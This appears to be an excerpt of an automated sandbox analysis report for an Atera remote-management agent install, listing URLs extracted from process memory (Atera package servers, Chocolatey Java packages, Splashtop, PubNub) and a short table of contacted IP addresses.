                                    https://community.chocolatey.org/api/v2/package/server-jre/8.0.192AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      https://ps.atera.com/agentpackageswin/AgentPackageSTRemote/16.0/AgentPackageSTRemote.zipAteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B8A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        https://community.chocolatey.org/api/v2/package/jre8/8.0.431AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          http://schemas.datacontract.orgAteraAgent.exe, 0000000C.00000002.1755843182.000001779F869000.00000004.00000800.00020000.00000000.sdmpfalse
                                            https://community.chocolatey.org/packages/asciidoctorj/2.5.13AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              https://ps.atera.com/agentpackagesnet45/AgentPackageMarketplace/1.6/AgentPackageMarketplace.zipAteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                https://github.com/adoptium/jdk8u/blob/master/LICENSEAgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=b0a02166-da11-4e5e-9bd0-e30e8bdfd576AteraAgent.exe, 0000001A.00000002.2683966868.000002163055F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    https://adoptopenjdk.net/AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      https://ps.atera.com/installers/EO.WebBrowser/eo.webbrowser.24.1.46.nupkgXAgentPackageTicketing.exe, 0000002C.00000002.3063046700.000002140007F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        https://ps.atera.com/agentpackagesnet45/AgentPackageSystemTools/27.12/AgentPackageSystemTools.zip?0YAteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          http://www.chambersign.org1AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B438000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            https://ps.atera.com/agentpackagesnet45/AgentPackageMonitoring/38.1/AgentPackageMonitoring.zip?0YJRFAteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              https://nlog-project.org/AgentPackageMonitoring.exe, 00000023.00000002.2125875531.000001F735E48000.00000002.00000001.01000000.00000024.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2123394942.000001F735D72000.00000002.00000001.01000000.00000024.sdmpfalse
                                                                https://agent-api.atera.com/Production/Agent/track-eventrundll32.exe, 00000004.00000002.1702577102.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1702577102.0000000004CA4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1807492407.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1807492407.0000000004D54000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2573114268.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2573114268.0000000004BF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  https://github.com/corretto/corretto-8/blob/develop/LICENSEAgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGESTREMOTE/24.3/AGENTPACKAGESTREMOTE.ZIPAteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      https://github.com/adoptium/temurin11-binaries/releases/download/jdk-11.0.25%2B9/OpenJDK11U-jre_x64_AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        http://openjdk.java.net/legal/AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          http://schemas.datacontract.org/2004/07/System.ServiceProcessAteraAgent.exe, 0000000C.00000002.1755843182.000001779F869000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            https://wiki.openjdk.java.net/display/JDKUpdates/JDK11uAgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              https://my.splashtop.com/csrs/winAgentPackageSTRemote.exe, 00000021.00000000.2019302027.000002EF73BC2000.00000002.00000001.01000000.0000001A.sdmpfalse
                                                                                https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=b3da8718-647d-4170-800b-e0be5a02ff6dAteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENT.PACKAGE.AVAILABILITY/0.16/AGENT.PACKAGE.AVAILABILITY.ZAteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    https://chocommunity.atera.com/api/v2/Search()?$filter=IsApproved%20and%20IsLatestVersion&$orderby=DAgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802B4000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153804BF000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153803ED000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153806F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      https://www.jetbrains.com/teamcity/buy/IsLaAgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        https://ps.atera.com/agentpackageswin/AgentPackageRuntimeInstaller/13.0/AgentPackageRuntimeInstallerAteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          https://agent-api.atera.com/Production/Agent/dynamic-fields/AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            https://community.chocolatey.org/api/v2/package/liberica17jre/17.0.13.12AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              http://www.syntevo.com/static/smart/download/smartgit/smartgit-win32-setup-jre-7_1_1.zipAgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                http://my.splashtop.comAgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF001AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  https://cdn.statically.io/gh/asciidoctor/brand/b9cf5e27/logo/logo-fill-color.svgAgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    https://download.splashtop.com/csrs/Splashtop_Streamer_Win_DEPLOY_INSTALLER_v3.7.2.4.exeAgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF001AA000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF001CF000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF001CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      https://community.chocolatey.org/api/v2/package/smartgit-with-jre/7.1.1AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        https://ps.atera.com/agentpackagesnet45/AgentPackageTaskScheduler/17.2/AgentPackageTaskScheduler.zipAteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          https://asciidoctor.zulipchat.com/AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            https://www.nuget.org/packages/NLog.Web.AspNetCoreAgentPackageMonitoring.exe, 00000023.00000002.2125875531.000001F735E48000.00000002.00000001.01000000.00000024.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2123394942.000001F735D72000.00000002.00000001.01000000.00000024.sdmpfalse
                                                                                                              https://community.chocolatey.org/packages/javaruntime/8.0.431AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                https://github.com/flyway/flywayAgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  https://rawcdn.githack.com/ajshastri/chocolatey-packages/a698d21b3c63b9ff7e01f442f37cdb7ecf89925a/icAgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    https://community.chocolatey.org/package/ReportAbuse/flyway.commandline.withjre/10.21.0AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      https://community.chocolatey.orgAgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=1a7f0a96-6cc5-4ebb-9ff5-3167722267ebAteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          https://community.chocolatey.org/packages/adoptopenjdk8openj9jre/8.292.10AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            https://ps.atera.com/agentpackagescrossplatform/AgentPackageSTRemote/2.8/AgentPackageSTRemote.ziphAteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B9E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              https://josm.openstreetmap.de/reportAgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                https://github.com/AdoptOpenJDK/openjdk11-binaries/releases/download/jdk-11.0.11%2B9_openj9-0.26.0/OAgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  https://community.chocolatey.org/package/ReportAbuse/adoptopenjdk14jre/14.0.2.1200AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesTAgentPackageMonitoring.exe, 00000023.00000002.2123394942.000001F735D72000.00000002.00000001.01000000.00000024.sdmpfalse
                                                                                                                                      https://ps.atera.com/aAteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        https://urn.to/r/sds_seeAgentPackageMonitoring.exe, 00000023.00000002.2128484698.000001F735F12000.00000002.00000001.01000000.00000026.sdmpfalse
                                                                                                                                          https://docs.aws.amazon.com/corretto/AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            https://ps.atera.com/agentpackagesmac/AgentPackageSTRemote/24.3/AgentPackageSTRemote.ziphAteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B9E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              https://community.chocolatey.org/packages/adoptopenjdk11openj9jre/11.0.11.900AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                https://my.splashtop.comAgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF00111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  https://community.chocolatey.org/api/v2/package/Temurinjre/21.0.5.11AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    https://community.chocolatey.org/package/ReportAbuse/openjdk11jre/11.0.16.20220913AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      http://www.abit.com.tw/AgentPackageMonitoring.exe, 00000023.00000002.2121016000.000001F735BF2000.00000002.00000001.01000000.00000021.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E222D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        https://chocolatey.org/packages/adoptopenjdkjre):AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          https://community.chocolatey.org/api/v2/package/teamcity-preinstalledjre/2024.12.0AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            https://community.chocolatey.org/package/ReportAbuse/javaruntime-platformspecific/7.0.79.20161125AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              https://ps.atera.com/agentpackagesmac/Agent.Package.Watchdog/2.0/Agent.Package.Watchdog.zipAteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                https://community.chocolatey.org/api/v2/package/adoptopenjdkopenj9jre/16.0.1.900AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  https://github.com/rgra/choco-packages/tree/master/server-jre8AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://ps.atera.com/agentpackagesmac/AgentPackageTaskScheduler/13.0/AgentPackageTaskScheduler.zipAteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      https://community.chocolatey.org/api/v2/package/josm/19265.0.0AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        http://www.w3.oAteraAgent.exe, 0000000C.00000002.1755843182.000001779F869000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://www.jetbrains.com/teamcity/documentation/AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            https://community.chocolatey.org/package/ReportAbuse/openjdk8jre/8.342.07.20220913AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              http://mail.openjdk.java.net/mailman/listinfoAgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                https://community.chocolatey.org/package/ReportAbuse/server-jre/8.0.192AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://ps.pndsn.com/v2/subscribAteraAgent.exe, 0000001A.00000002.2683966868.0000021630B2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    https://github.com/chocolatey/chocolatey-coreteampackagesAgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2986692280.00000153FE542000.00000002.00000001.01000000.0000004C.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      https://ps.atera.com/agentpackagesmac/Agent.Package.Availability/0.16/Agent.Package.Availability.zipAteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://agent-api.atera.com/Production/Agent/agentMonitoredDevices/52187e48-563c-468d-9785-3542f81fbAgentPackageInternalPoller.exe, 0000002F.00000002.2437952320.0000022B826A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://adoptopenjdk.net/PAgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://github.com/adoptium/temurin17-binaries/releases/download/jdk-17.0.12%2B7/OpenJDK17U-jre_x86-AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 0000001F.00000002.2059219762.0000022F4E41F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2059219762.0000022F4D8E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2059219762.0000022F4E445000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                https://community.chocolatey.org/packages/server-jre10/10.0.1AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  https://github.com/nlog/NLog/wiki/Configuration-file#variablesAteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://community.chocolatey.org/packages/teamcity/2024.12.0AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://ps.pndsn.com/v2/subscribe/AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427F2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C4291B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        https://asciidoctor.org/docs/user-manual/AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          https://bell-sw.com/AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            https://flywaydb.org/documentation/releaseNotesAgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              https://ps.atera.com/agentpackagescrossplatform/AgentPackageMonitoring/0.5/AgentPackageMonitoring.ziAteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B8A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                https://community.chocolatey.org/packages/openjdk8jre/8.342.07.20220913AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://github.com/proudcanadianeh/ChocoPackages/tree/master/jre8/masterAgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://community.chocolatey.org/package/ReportAbuse/teamcity-preinstalledjre/2024.12.0AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      http://crl.defence.gov.au/pki0AteraAgent.exe, 0000000D.00000002.2355746152.0000021C5B02B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://agent-api.atera.com/Production/Agent/TraceAteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          https://ps.atera.com/agentpackagesnet45/AgentPackageInternalPoller/23.8/AgentPackageInternalPoller.zAteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/52187e48-563c-468d-9785AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B4C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              https://github.com/adoptium/temurin21-binaries/releases/download/jdk-21.0.5%2B11/OpenJDK21U-jre_x64_AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                https://community.chocolatey.org/packages/TeamCity-PreinstalledJRE)AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  https://ps.atera.com/agentpackagesneAteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=9b97c88b-00f9-4ad4-acca-b3179ff49e5eAteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      https://github.com/IdealChain/chocolatey-packages/tree/master/josmAgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpfalse

                                                                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                                                        Public IPs

                                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                        40.119.152.241
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                                                                                                                                                                                        35.157.63.227
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		16509AMAZON-02USfalse
                                                                                                                                                                                                                                        13.35.58.89
                                                                                                                                                                                                                                        		unknownUnited States
                                                                                                                                                                                                                                        		16509AMAZON-02USfalse
